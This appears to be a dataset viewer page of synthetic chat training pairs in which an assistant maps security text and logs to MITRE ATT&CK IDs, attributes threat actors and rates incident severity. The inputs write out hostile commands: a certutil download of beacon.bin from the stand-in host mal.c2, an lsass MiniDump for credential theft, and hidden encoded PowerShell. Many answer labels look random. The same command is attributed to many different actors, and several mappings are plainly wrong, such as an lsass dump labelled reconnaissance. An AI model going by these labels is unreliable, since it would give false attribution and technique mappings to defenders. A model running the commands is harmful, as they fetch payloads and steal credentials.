messages listlengths 2 2 |
|---|
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.",
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT29 has gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"High... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.40.98.233",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0006\",... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-JMT3219X78)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.004\", \"T1547\"]... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Winnti for Windows can determine if the OS on a compromised host is newer than Windows XP.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assista... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CORESHELL has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder."... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1941 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-K691JIU4MN)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Impact",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.187.99.5",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0005\"], \"techniques\": [\"T1003.001\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-N1AB7XE8FQ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Command and Control, Execution",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.87.106.150",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0010\"], \"techniq... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-7M8TF8GDJW)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3247 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: KeyBoy uses Python scripts for installing files and performing execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.006\", \"T1059\"]}",
"role": "assistant"
}
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pand... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.1.19.232",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0011\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2765 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.11.210.198",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-QWOJ1RXL6J)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Command and Control",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-94IGHC60V1)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Defense Evasion",
"role": "user"
},
{
"content"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confiden... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Lucifer has the ability to identify the username on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Frankenstein has established persistence through a scheduled task using the command: /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR , named \"WinUpdate\".",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.8.78.40",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Donut code modules use various API functions to load and inject code.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-9DZER9WP41)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Execution, Lateral Movement",
"role": "user"
},
{
"conten... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SideTwist can encrypt C2 communications with a randomly generated key.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: A dropper used by Putter Panda installs itself into the ASEP Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with a value named McUpdate.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-9F09XV71O5)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Exfiltration",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and respon... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1243 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.129.80.153",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0011\"], \"techniques\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-MTMR9KW3HV)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-MER15GQ51O)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Exfiltration",
"role": "user"
},
{
"content... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: FIN4 has accessed and hijacked online email communications using stolen credentials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1114\", \"T1114.002\"]}",
"role": "assi... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 989 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confiden... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-HCLTXM2LXP)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Command and Control",
"role": "user"
},
{
"content": "... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: SDBbot has the ability to identify the user on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}",
"role": "assis... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TeamTNT has developed custom malware such as Hildegard.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1587\", \"T1587.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.",
"role": "user"
},
{
"content": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.3.158.243",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}",
"role": "assis... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-JLCRSD6RPS)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Ex... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-JHHJG3JNXI)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: If a login hook already exists, adversaries can add additional commands to an existing login hook.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1037.002\",... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Exfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1048\"]}",
"ro... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1106\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-X2PL17ZW6W)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Discovery, Defense Evasion",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-E9OXQ4IPVQ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control, Collection, Impact",
"role": "user"
},
{
"conten... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Remsec can dump the SAM database.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-F9HBO0L0OK)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Critica... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Fox Kitten has created a local user account with administrator privileges.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1136\", \"T1136.001\"]}",
"role": "assistan... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.67.41.38",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0003\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.23.176.212",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang P... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-80INDY1CU1)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery, Execution",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.21.13.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3596 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-4OQANP3N5E)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Persistence",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: MuddyWater has used malware that can execute PowerShell scripts via DDE.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1559\", \"T1559.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-9Q4SLETEZ0)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 962 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2803 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Detection of compromised /techniques/T1078 in-use by adversaries may help as well.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.51.65.9",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-GCT0WRB1Q6)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Reconnaissance, Discovery",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-J2BS7EGQ2Y)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Reconnaissance",
"role": "user"
},
{
"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.70.160.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA004... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.141.250.49",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1736 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.100.158.238",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Koadic can use Regsvr32 to execute additional payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.010\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.61.17.43",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2795 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"confidence\": \... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1703 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.3.204.99",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.138.250.204",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1531\"]}",
"ro... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the \"wercplsupport\" service.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FLASHFLOOD achieves persistence by making an entry in the Registry's Run key.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}",
"role": "assistant"
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.32.132.102",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"te... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.157.244.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-INB47E4U4U)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Discovery",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confi... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA000... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2272 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.121.49.207",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T1003.00... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1037.004\", \"T1037... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-9M57659CVB)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\": \"High... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniq... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.